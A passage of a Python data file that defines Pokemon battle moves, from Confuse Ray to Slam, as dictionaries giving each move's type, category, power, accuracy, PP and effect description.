18,\n\tACCURACY = 85,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nCONFUSE_RAY = dict(\n\tELEMENT_TYPE = \"GHOST\",\n\tATTRIBUTES = GHOST,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Confuses opponent.\")\n\nCONFUSION = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 50,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"May confuse opponent.\")\n\nCONSTRICT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 10,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"May lower opponent's Speed by one stage.\")\n\nCONVERSION = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Changes user's type to that of its first move.\")\n\nCOUNTER = dict(\n \tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"When hit by a Physical Attack, user strikes back with 2x POWER.\")\n\nCRABHAMMER = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nCUT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 95,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"\")\n\nDEFENSE_CURL = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Raises user's Defense.\")\n\nDIG = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Digs underground on first turn, attacks on second. Can also escape from caves.\")\n\nDISABLE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Opponent can't use its last attack for a few turns.\")\n\nDIZZY_PUNCH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 70,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May confuse opponent.\")\n\nDOUBLE_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 30,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Hits twice in one turn.\")\n\nDOUBLE_SLAP = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nDOUBLE_TEAM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Raises user's Evasiveness.\")\n\nDOUBLE_EDGE = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 120, \n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"User receives recoil damage.\")\n\nDRAGON_RAGE = dict(\n\tELEMENT_TYPE = \"Dragon\",\n\tATTRIBUTES = DRAGON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Always inflicts 40 HP.\")\n\nDREAM_EATER = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 100,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"User recovers half the HP inflicted on a sleeping opponent.\")\n\nDRILL_PECK = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"\")\n\nEARTHQUAKE = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"POWER is doubled if opponent is underground from using Dig.\")\n\nEGG_BOMB = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100, \n\tACCURACY = 75,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"\")\n\nEMBER = dict(\n \tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"May burn opponent.\")\n\nEXPLOSION = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 250,\n\tACCURACY = 100,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"User faints.\")\n\nFIRE_BLAST = dict(\n\tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110, \n\tACCURACY = 85,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"May burn opponent.\")\n\nFIRE_PUNCH = dict(\n\tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May burn opponent.\")\n\nFIRE_SPIN = dict(\n\tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 35, \n\tACCURACY = 85,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\nFISSURE = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"One-Hit-KO, if it hits.\")\n\nFLAMETHROWER = dict(\n \tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May burn opponent.\")\n\nFLASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nFLY = dict(\n \tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 90,\n\tACCURACY = 95,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Flies up on first turn, attacks on second turn.\")\n\nFOCUS_ENERGY = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Increases critical hit ratio.\")\n\nFURY_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nFURY_SWIPES = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 18,\n\tACCURACY = 80,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nGLARE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Paralyzes opponent.\")\n\nGROWL = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Lowers opponent's Attack.\")\n\nGROWTH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Raises user's Attack and Special Attack.\")\n\nGUILLOTINE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"One-Hit-KO, if it hits.\")\n\nGUST = dict(\n \tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"Hits Pokemon using Fly/Bounce with double POWER.\")\n\nHARDEN = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Raises user's Defense.\")\n\nHAZE = dict(\n \tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Resets all stat changes.\")\n\nHEADBUTT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 70,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nHIGH_JUMP_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 130, \n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"If it misses, the user loses half their HP.\")\n\nHORN_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"\")\n\nHORN_DRILL = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"One-Hit-KO, if it hits.\")\n\nHYDRO_PUMP = dict(\n\tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110, \n\tACCURACY = 80,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"\")\n\nHYPER_BEAM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 150, \n\tACCURACY = 90,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"User must recharge next turn.\")\n\nHYPER_Fang = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 90,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nHYPNOSIS = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 60,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nICE_BEAM = dict(\n\tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May freeze opponent.\")\n\nICE_PUNCH = dict(\n\tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May freeze opponent.\")\n\nJUMP_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100, \n\tACCURACY = 95,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"If it misses, the user loses half their HP.\")\n\nKARATE_CHOP = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nKINESIS = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 80,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nLEECH_LIFE = dict(\n\tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User recovers half the HP inflicted on opponent.\")\n\nLEECH_SEED = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User steals HP from opponent each turn.\")\n\nLEER = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Lowers opponent's Defense.\")\n\nLICK = dict(\n \tELEMENT_TYPE = \"GHOST\",\n\tATTRIBUTES = GHOST,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 30,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nLIGHT_SCREEN = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Halves damage from Special attacks for 5 turns.\")\n\nLOVELY_KISS = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nLOW_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"The heavier the opponent, the stronger the attack.\")\n\nMEDITATE = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Raises user's Attack.\")\n\nMEGA_DRAIN = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40, \n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"User recovers half the HP inflicted on opponent.\")\n\nMEGA_KICK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 120, \n\tACCURACY = 75,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"\")\n\nMEGA_PUNCH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"\")\n\nMETRONOME = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User performs any move in the game at random.\")\n\nMIMIC = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Copies the opponent's last move.\")\n\nMINIMIZE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Sharply raises user's Evasiveness.\")\n\nMIRROR_MOVE = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"User performs the opponent's last move.\")\n\nMIST = dict(\n \tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"User's stats cannot be changed for a period of time.\")\n\nNIGHT_SHADE = dict(\n\tELEMENT_TYPE = \"GHOST\",\n\tATTRIBUTES = GHOST,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Inflicts damage equal to user's level.\")\n\nPAY_DAY = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"A small amount of money is gained after the battle resolves.\")\n\nPECK = dict(\n \tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 35,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nPETAL_DANCE = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 120, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User attacks for 2-3 turns but then becomes confused.\")\n\nPIN_MISSILE = dict(\n\tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 25,\n\tACCURACY = 95,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nPOISON_GAS = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 90,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Poisons opponent.\")\n\nPOISON_POWDER = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"Poisons opponent.\")\n\nPOISON_STING = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"May poison the opponent.\")\n\nPOUND = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nPSYBEAM = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May confuse opponent.\")\n\nPSYCHIC = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May lower opponent's Special Defense.\")\n\nPSYWAVE = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 80,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Inflicts damage 50-150% of user's level.\")\n\nQUICK_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"User attacks first.\")\n\nRAGE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 20,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Raises user's Attack when hit.\")\n\nRAZOR_LEAF = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 55,\n\tACCURACY = 95,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nRAZOR_WIND = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 80, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Charges on first turn, attacks on second. High critical hit ratio.\")\n\nRECOVER = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User recovers half its max HP.\")\n\nREFLECT = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Halves damage from Physical attacks for 5 turns.\")\n\nREST = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User sleeps for 2 turns, but user is fully healed.\")\n\nROAR = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"In battles, the opponent switches. In the wild, the Pokemon runs.\")\n\nROCK_SLIDE = dict(\n\tELEMENT_TYPE = \"ROCK\",\n\tATTRIBUTES = ROCK,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May cause flinching.\")\n\nROCK_THROW = dict(\n\tELEMENT_TYPE = \"ROCK\",\n\tATTRIBUTES = ROCK,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 90,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"\")\n\nROLLING_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 60,\n\tACCURACY = 85,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nSAND_ATTACK = dict(\n\tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nSCRATCH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nSCREECH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 85,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Sharply lowers opponent's Defense.\")\n\nSEISMIC_TOSS = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Inflicts damage equal to user's level.\")\n\nSELF_DESTRUCT = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 200, \n\tACCURACY = 100,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"User faints.\")\n\nSHARPEN = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Raises user's Attack.\")\n\nSING = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 55,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nSKULL_BASH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 130, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Raises Defense on first turn, attacks on second.\")\n\nSKY_ATTACK = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 140, \n\tACCURACY = 90,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"Charges on first turn, attacks on second. May cause flinching.\")\n\nSLAM = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = 